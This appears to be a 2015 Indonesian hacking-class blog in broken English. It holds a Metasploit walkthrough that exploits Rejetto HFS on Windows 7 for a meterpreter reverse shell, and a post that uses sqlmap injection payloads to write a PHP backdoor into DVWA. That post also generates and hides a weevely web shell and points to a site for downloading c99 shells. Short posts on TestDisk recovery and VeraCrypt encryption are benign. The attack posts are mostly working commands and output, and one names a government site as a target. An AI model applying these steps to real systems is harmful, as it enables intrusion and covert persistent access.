Minggu, 06 September 2015

HOW TO HACK WINDOWS 7

1 OPEN TERMINAL

┌─[✗]─[root@parrot]─[/home/budhya]
└──╼ #msfconsole
msf > use exploit/windows/http/rejetto_hfs_exec
msf exploit(rejetto_hfs_exec) >


3 set PAYLOAD windows/meterpreter/reverse_tcp
show options

 
4 msf exploit(rejetto_hfs_exec) > set RHOST (192.168.1.102) ip target
RHOST => 192.168.1.102

5 msf exploit(rejetto_hfs_exec) > set SRVHOST 192.168.1.110 ( IP KITA)
SRVHOST => 192.168.1.110

 
6 msf exploit(rejetto_hfs_exec) > set LHOST 192.168.1.110
LHOST => 192.168.1.110

 
7 msf exploit(rejetto_hfs_exec) > set LPORT 4444
LPORT => 4444

8 msf exploit(rejetto_hfs_exec) > exploit

 
9 meterpreter > shell
Process 3180 created.
Channel 2 created.
 
10 netx for loking diterc tory




meterpreter > ls
Listing: C:\Users\monyonk\Desktop
=================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2015-09-06 22:26:18 +0700 %TEMP%
100666/rw-rw-rw- 26125 fil 2015-09-02 20:50:05 +0700 Generate-Macro.ps1
100666/rw-rw-rw- 1436 fil 2015-09-02 21:13:02 +0700 RegistryCleanup.ps1
100666/rw-rw-rw- 171 fil 2015-09-02 21:11:47 +0700 SchTaskCleanup.ps1
40777/rwxrwxrwx 0 dir 2015-08-27 17:52:27 +0700 darkcomet 5.3.1
100666/rw-rw-rw- 282 fil 2014-12-30 01:27:27 +0700 desktop.ini
40777/rwxrwxrwx 0 dir 2015-09-06 22:08:57 +0700 egy.txt
40777/rwxrwxrwx 0 dir 2015-09-06 22:09:15 +0700 egywashere
40777/rwxrwxrwx 0 dir 2015-09-06 22:12:49 +0700 egyyyyyy
100777/rwxrwxrwx 2498560 fil 2014-08-24 21:18:36 +0700 hfs.exe
40777/rwxrwxrwx 0 dir 2015-09-06 22:13:20 +0700 ijinmassayasdhmasuk
40777/rwxrwxrwx 0 dir 2015-09-06 22:25:42 +0700 koramil.exe
40777/rwxrwxrwx 0 dir 2015-09-06 22:25:41 +0700 reky

11 create new file

meterpreter > mkdir jagotarung.exe
Creating directory: jagotarung.exe
 
12 meterpreter >ls

Sabtu, 05 September 2015

RECAPRY DATA (PENGEMBALIAN /PENCARIAN DATA YANG TER ENKRIPSI)

DIGITAL FORENSIC
1     IDENTIFICATION
2     PERESERVATION
    - chain of custoday
    - Labeling
    -imaging/Clone(membuat kmbarannya)

3     EXAMINATION (pengujian)
4     ANALYSIS
5     REPORTING/PRODUCK
                                     APLIKASI YG BIASA D GUNAKAN
                                         a.(TESDISK)
                                         b.(AUTOPSY) biasa d buka d brouser.

┌─[budhya@parrot]─[~]
└──╼ $sudo su
[sudo] password for budhya:
┌─[root@parrot]─[/home/budhya]
└──╼ #apt-get install testdisk
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
testdisk
0 upgraded, 1 newly installed, 0 to remove and 151 not upgraded.
Need to get 394 kB of archives.
After this operation, 1,419 kB of additional disk space will be used.
Get:1 http://eu.repository.frozenbox.org/mirrors/debian/ jessie/main testdisk i386 6.14-3+b2 [394 kB]
Fetched 394 kB in 3s (104 kB/s)
Selecting previously unselected package testdisk.
(Reading database ... 269039 files and directories currently installed.)
Preparing to unpack .../testdisk_6.14-3+b2_i386.deb ...
Unpacking testdisk (6.14-3+b2) ...
Processing triggers for man-db (2.7.0.2-5) ...
Setting up testdisk (6.14-3+b2) …

 
┌─[root@parrot]─[/home/budhya]
└──╼ #testdisk /dev/sdb
TestDisk 6.14, Data Recovery Utility, July 2013
Christophe GRENIER <grenier@cgsecurity.org>
http://www.cgsecurity.org
┌─[root@parrot]─[/home/budhya]
└──╼ #testdisk /dev/sdb
the disk is name TOSHIBA andthan you (ENTER)
 next you seleck a intel partision and (ENTER)
 Next you seleck ANALYSE And ENTER
 Next you seleck again QUICK SEARCH And ENTER
 Next seleck CONTINUE (ENTER)
 The next you seleck (P) p is is for (list file) for looking your file in direcktory
 the next  is RED FILE in a direck tory this is a file target and copy you mas seleck (C) In a Red file 
 next selec cofy again is finished cofy  is list green copy done
  and search in your pc for paste after copy your file in your list red directory
 and seach from  deroctory pc the last paste after copy and finis

Jumat, 04 September 2015

ENKRIPSI DISK AND MASSAGE /EMAIL WITH THUNDERBIRD AND VERACRYPT

open in your terminal for looking your speck in your pc
write

1  └──╼ $sudo su
[sudo] password for budhya:
┌─[root@parrot]─[/home/budhya]
└──╼ #fdisk -l

 open aplication VERACRYPT
 the next run aplication and sercg your patition in pripat
 next selet your target in pripate
 the next klick ok
 and then the next
 insert your password for vripate partition
 the finished hidden your partition


THE NEXT PRIPAT EMAIL Open the aplication THUNDERBIRD
And start seyup now
==>>the next search key generation console
simple the seckription email
the next id for email frends..

Kamis, 03 September 2015

EXPLOIT DVWA AND UPLOAD BACKDOOR HIDDEN BACDOR

1.target.go.id/idex.php?id_berita=12&
Open terminal..

1.1 ┌─[budhya@parrot]─[~]
└──╼ $sudo su
[sudo] password for budhya:
┌─[root@parrot]─[/home/budhya]
└──╼ #msfconsole
                                                 

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.pro


Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.3-2015062101 [core:4.11.3.pre.2015062101 api:1.0.0]]
+ -- --=[ 1463 exploits - 838 auxiliary - 229 post        ]
+ -- --=[ 428 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

┌─[root@parrot]─[/home/budhya]
└──╼ #sqlmap -l simple.txt
         _
open new terminal

┌─[✗]─[root@parrot]─[/home/budhya]

└──╼ #cd /usr/share/webshells/php
┌─[root@parrot]─[/usr/share/webshells/php]
└──╼ #


└──╼ #ls
findsock.c  php-backdoor.php  php-findsock-shell.php  php-reverse-shell.php  qsd-php-backdoor.php  simple-backdoor.php
┌─[root@parrot]─[/usr/share/webshells/php]
└──╼ #

nex  copy file 2
└──╼ #cp php-backdoor.php ~
┌─[root@parrot]─[/usr/share/webshells/php]
└──╼ #
next loking finished cofy
┌─[root@parrot]─[~]
└──╼ #pwd
/root
┌─[root@parrot]─[~]
└──╼ #ls
12 hari kmaren  Desktop          maltego_3.6.1.6748-0kali2_all.deb  New Graph (1).mtgx  sessions          Videos
9844.py         Documents        MaltegoChlorineCE.3.6.0.6640.deb   New Graph (2).mtgx  Templates         VirtualBox VMs
abuy.php        Downloads        Metasploitable2-Linux              php-backdoor.php    tmp.php           vpngate_vpn239494852.opengw.net_udp_1947.ovpn
abuy.py         HARI 8           Music                              Pictures            TUGAS MLAM INI .  vpngate_vpn800695980.opengw.net_udp_1605.ovpn
blackhat.jpg    malam ini tugas  NewFolder                          Public              ub 10.04.vdi      Wireles hacking
┌─[root@parrot]─[~]
└──╼ #

next step upload backdoor
─[✗]─[root@parrot]─[/home/budhya]
└──╼ #sqlmap -l /home/budhya/dvwaheader.txt -p "id" --file-write=/root/php-backdoor.php --file-dest=/www/dvwa/hackable/uploads/abouy.php
         _
apabila bacdoor telah berhasil di upload maka akan ada pemberitauan pada terminal

Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=gdyvv' AND (SELECT 2276 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (CASE WHEN (2276=2276) THEN 1 ELSE 0 END)),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GfHD'='GfHD&Submit=Submit


    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=gdyvv' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x426b64424b7872745956,0x7176707171)#&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=gdyvv' AND (SELECT * FROM (SELECT(SLEEP(5)))vTIN) AND 'qWtS'='qWtS&Submit=Submit
---
do you want to exploit this SQL injection? [Y/n]
[22:01:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[22:01:48] [INFO] fingerprinting the back-end DBMS operating system
[22:01:49] [WARNING] reflective value(s) found and filtering out
[22:01:49] [INFO] the back-end DBMS operating system is Linux
[22:01:49] [WARNING] expect junk characters inside the file as a leftover from UNION query
do you want confirmation that the local file '/root/php-backdoor.php' has been successfully written on the back-end DBMS file system (/var/www/dvwa/hackable/uploads/abouy.php)? [Y/n]
[22:01:50] [INFO] the remote file /var/www/dvwa/hackable/uploads/abouy.php is larger than the local file /root/php-backdoor.php
[22:01:50] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-09032015_1001pm.csv'

the next is prosesing upload backdoor

the next uploading bacdor is finish


next looking for dvwa bacdoor is uploading thr next runing bacdor
search name backdoor upload
 thr simple upload bacdor the name kis abuy
 next write touch enter next ls for luking diractory

for this backdoor you create new backdor  in
http://www.r57shell.net/ from this situs you download bacdor the name c99hell the next you exstraxhere open

and the next upload again bacdor is finis download and exstrak here and rename you upload again in DVWA


after open and exstrak you rename file my sample is rename (jagotarung.php) next simple finished upload bacdor 2 and brouse loking in
 http://192.168.1.123/dvwa/jagotarung.php
the next you must delete becdor 1 ..because septy bacdor 2
hackable,upload,next cklis,,withselet.delete,konfirm


next the simple edit in html name WELCOME rename FOR JAGO TARUNG
next hidden your bacdoor bi septy
open new terminal write
┌─[root@parrot]─[/home/budhya]
└──╼ # weevely generate 12345 tarung.php
the next lalu enter kalo ber hasil maka mun cul
[generate.php] Backdoor file 'tarung.php' created with password '12345'

 ┌─[root@parrot]─[/home/budhya]
└──╼ #cat tarung.php
<?php
thr cext copy is url file
is blokinng in image
and paste in editor BACDOOR DVWA
the next is SAVE and loking in terminal
copy ulr and wrait in terminal
http://192.168.1.123/dvwa/index.php 12345 (12345 is password)
if you loking for hidden your file you wrait ls.......finis.